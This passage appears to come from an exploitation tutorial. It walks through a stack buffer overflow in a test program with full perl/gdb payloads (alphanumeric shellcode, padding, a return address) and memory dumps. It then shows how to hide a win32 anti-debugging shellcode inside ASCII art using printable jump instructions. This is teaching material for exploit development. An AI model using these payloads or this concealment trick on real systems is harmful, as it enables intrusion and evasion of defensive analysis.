A little bit of hex math will tell us that 0x748 - 0x538 = 0x210 (or 528 in decimal). Dividing this by 32 gives us the decimal value 16.5. If we go directly to 0xbffff748, we will also have skipped 18 bytes of our code. To round it off, let's make sure we have 32 "A" characters at the beginning. So, if we want our code to execute properly, we can deduce that we will need at least 16 'popa' instructions to get %esp to point to our own code. Let's do just a little more math here. We start with our 32 'A' characters, then 16 'a' characters. That adds 16 to the required value of %esp, so we'll add two more 'a' characters (for a total of 18) and a trailing 34 bytes of NOPs before our return pointer.

A Successful Overflow

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Breakpoint 1, 0x080483e7 in main ()
(gdb) continue
Continuing.
[Inferior 1 (process 29422) exited with code 03]

Analysis says

So here's what happened. When the code hit 0xbffff748, we added (18 * 32 = 576 = 0x240) to the %esp register. Some quick math explains that 0xbffff538 + 0x240 = 0xbffff778. An examination of where the code wound up will indicate that %esp has been successfully set to a value after the shellcode.

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Breakpoint 1, 0x080483e7 in main ()
(gdb) x/200x $esp
0xbffff538:     0x00000000      0xb7e35483      0x00000002      0xbffff5d4
[Shortened for brevity]
0xbffff738:     0x41410066      0x41414141      0x41414141      0x41414141
0xbffff748:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff758:     0x61614141      0x61616161      0x61616161      0x61616161
0xbffff768:     0x61616161      0x6a6a5061      0x486a3458      0x4f653566
0xbffff778:     0x30573566      0x6a5a5a50      0x33345830      0x48485b50
0xbffff788:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff798:     0x41414141      0x41414141      0x41414141      0x41414141
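The pointer arithmetic in this analysis is easy to re-check. The sketch below assumes only what the text states (each popad adds 32 to %esp, and the starting value 0xbffff538 comes from the dump); `esp_after_popads` is a hypothetical helper name.

```python
POPAD_BYTES = 32  # popad pops eight 4-byte registers


def esp_after_popads(esp: int, count: int) -> int:
    """Value of %esp after executing count popad instructions."""
    return (esp + count * POPAD_BYTES) & 0xFFFFFFFF


print(hex(18 * POPAD_BYTES))
print(hex(esp_after_popads(0xBFFFF538, 18)))
```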

Notice: So the offset 0x778 is still inside the shellcode. That's ok though, the original 'a' or popa at the very beginning of the shellcode sets %esp to 0xbffff788. Experiment with this by setting breakpoints at 0xbffff788 (or the return pointer + 28), and seeing what gets written. A value of 0xffff80cd will be written right there, and if you step through instruction by instruction, the dword after it will constantly change as it's being used for temporary stack space.

Protip: You can easily modify the exit code by modifying the ascii without having to go through the entire assembly and disassembly process over.

Changing the '3' to '4', and adding an additional decl %eax with 'H':

(gdb) r `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x35 . "\x48\xf7\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x35 . "\x48\xf7\xff\xbf"'`
[Inferior 1 (process 17860) exited with code 03]
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X44P[HHH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X44P[HHH" . "A"x34 . "\x48\xf7\xff\xbf"'`
[Inferior 1 (process 18701) exited with code 04]

Encoding Shellcode : Ascii Art

This is a simple win32 alphanumeric encoded shellcode expanded using jump. It is also possible to expand polymorphic code in this way, or to write a packer/unpacker that interacts with ascii art.

Let's start out with Koshi's 14 byte alphanumeric NtGlobalFlags payload:

 jpXV34dd3v09Fh

Notice: This payload ends on a CMP, so we'll have to add our own jump condition. If the values are equal, the debugger is present; if the values are not, there is no debugger present. So, we can use the je byte offset instruction (t in alpha) to maintain printable code. We'll want to exit if there's a debugger present, else we can continue code execution.

 
  push 'p'                          ;jp
  pop eax                           ;X    (eax = 0x70)
  push esi                          ;V
  xor esi, dword ptr ss:[esp]       ;34d  (the stack now contains esi, so esi = 0)
  xor esi, dword ptr fs:[esi+0x30]  ;d3v0 (load the dword at fs:[0x30], the PEB pointer, into esi)
  cmp dword ptr ds:[esi+0x68], eax  ;9Fh  (compare the dword at esi+0x68, NtGlobalFlag, with 0x70)

So for our beginning notes, we can be assured that the following must be sequential, and registers must be preserved:

V34dd3v0 - ESI must be zeroed, then the PEB pointer (used to reach NtGlobalFlag) must be stored in ESI.
esi cannot be modified until eax is set to 0x70/'p' and then 9Fh is run as a comparison.

Available comparison operators are a little hacky. We can compare the eax register to a dword using the '=' opcode (0x3d); other than that, we're limited to the less predictable 0x38-0x3b instructions. For brevity we will use the '=' opcode here. Other available printable comparison operators will be reserved for future instructions, as they get much more complex.

Suppose we wanted to jump 0x30 (48) bytes ahead in pure ascii. The easy way to do this is by setting the value of the eax register to a controllable ascii DWORD, comparing eax against that same DWORD so the zero flag is set, and then using je. In our case, we'll use the string 'code':

 hcodeX=codet0

Disassembled, this represents:

 push 'code'
 pop %eax
 cmp 'code', %eax
 je 0x30

Let's get ourselves some ascii art. This ascii art is 80 bytes wide, so each line is 81 bytes including the newline (0x0a).

                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo. 
                                                                     d"     YD 
                                                                     "Y88888P'

Let's see which lines look the best for code insertion. The string 'hcodeX=codet0' is 13 bytes. We can start with a jump to the big string of o's at the top of the 'D' in Debug. The first 'o' is at row two, column 23. 81 + 23 = 104, or 0x68, the 'h' character:

hcodeX=codeth                                                                  
                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

We have now jumped to the top of the D. So, going back to our shellcode, as long as we preserve eax, we can jump in the string '=codeth' which is 7 bytes, which lets us squeeze shellcode in spaces. Using our dword 'code' will actually let us tag our shellcode, serving as a tag on the next line in empty space. Because we can only jump 122 bytes, we can't get to a part of the ascii art with enough room. We can solve this problem by finding empty enough space to toss our jump code in, along with a little bit of the necessary shellcode:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codet?        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

We've actually gotten up to the ? mark, and all the way through the bit of code to store the PEB value into the %esi register using the string 'V34dd3v0', while maintaining our ability to jump around. Our next bit of code is going to be tricky. We'll have to jump 80 bytes to land at the top of our 'e'. From there we'll go to the lower top of the 'n', then to the middle of the 'e'. From there we go to the middle of the 'g', then to the bottom of the 'b', create an extra bottom on the 'D' to accentuate, and finally jump to the bottom of the 'g' when we're finished. The end result, after calculating out the ascii, looks like:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codeti        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  =codet.   888oooo.  oooo  oooo   .oooooooo
`888codetn  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 88=codetk  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `=codet5' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `=codet0'  `V88V"V8P' `8oooooo. 
                     =codet|                                         d"     YD 
                                                                     "jpX9Fht?
